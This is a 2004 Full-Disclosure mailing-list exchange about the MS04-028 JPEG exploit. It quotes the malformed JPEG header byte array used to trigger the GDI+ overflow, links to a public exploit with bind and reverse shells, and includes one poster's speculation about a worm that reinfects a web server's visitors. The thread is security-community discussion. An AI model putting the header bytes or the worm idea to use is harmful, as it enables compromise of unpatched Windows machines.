RE: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...

From: Castigliola, Angelo (ACastigliolaunumprovident.com)
Date: Mon Sep 27 2004 - 15:29:58 CDT


Eh, it would not be that hard to write up something that could revisit
all of the computers that hit the web server to infect them with
something after the initial jpg exploit was run. It would truly be a
one-of-a-kind worm. Reason enough in itself to motivate someone to write it.

As far as media hype, I'm all for it. It keeps the IT job market strong.

Angelo Castigliola III
Operations Technical Analyst I
UnumProvident IT Services
207.575.3820
 
-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
morning_wood
Sent: Saturday, September 25, 2004 2:06 PM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and
Bind shell ...

umm, no
all this has that's different is correct headers for bind or remote shell
option, and ability to set ports and return IP in the code, instead of
needing to use your own shellcode (or Metasploit's). note: there is no
new exploit code or vector

------------------- / snip /-----------------
new.
char header1[] =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
------------------- / snip /-----------------
old.
------------------- / snip /-----------------
char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
------------------- / snip /-----------------

take your media hype and die kthnx,
m.wood

> the last step before the worm
>
> http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html